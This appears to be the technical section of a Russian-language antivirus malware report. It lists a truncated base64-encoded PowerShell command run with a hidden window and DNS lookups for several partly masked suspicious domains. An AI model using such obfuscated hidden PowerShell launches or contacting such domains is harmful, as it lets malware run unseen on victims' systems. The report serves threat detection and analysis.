Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJAB4AGMAYgAwADAAMAA0ADcANgA5ADAAPQAnAGIAOAAyADAAMQB4ADAAMAA5ADAAMAAnADsAJAB4ADUAeAAzADAAOQA0ADMANAB...
- DNS ASK sp####adubai.com
- DNS ASK te###nciasv.com
- DNS ASK in######obiodelta.com.br
- DNS ASK ec##xc.com
- DNS ASK sa##l.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJAB4AGMAYgAwADAAMAA0ADcANgA5ADAAPQAnAGIAOAAyADAAMQB4ADAAMAA5ADAAMAAnADsAJAB4ADUAeAAzADAAOQA0ADMANAB...' (со скрытым окном)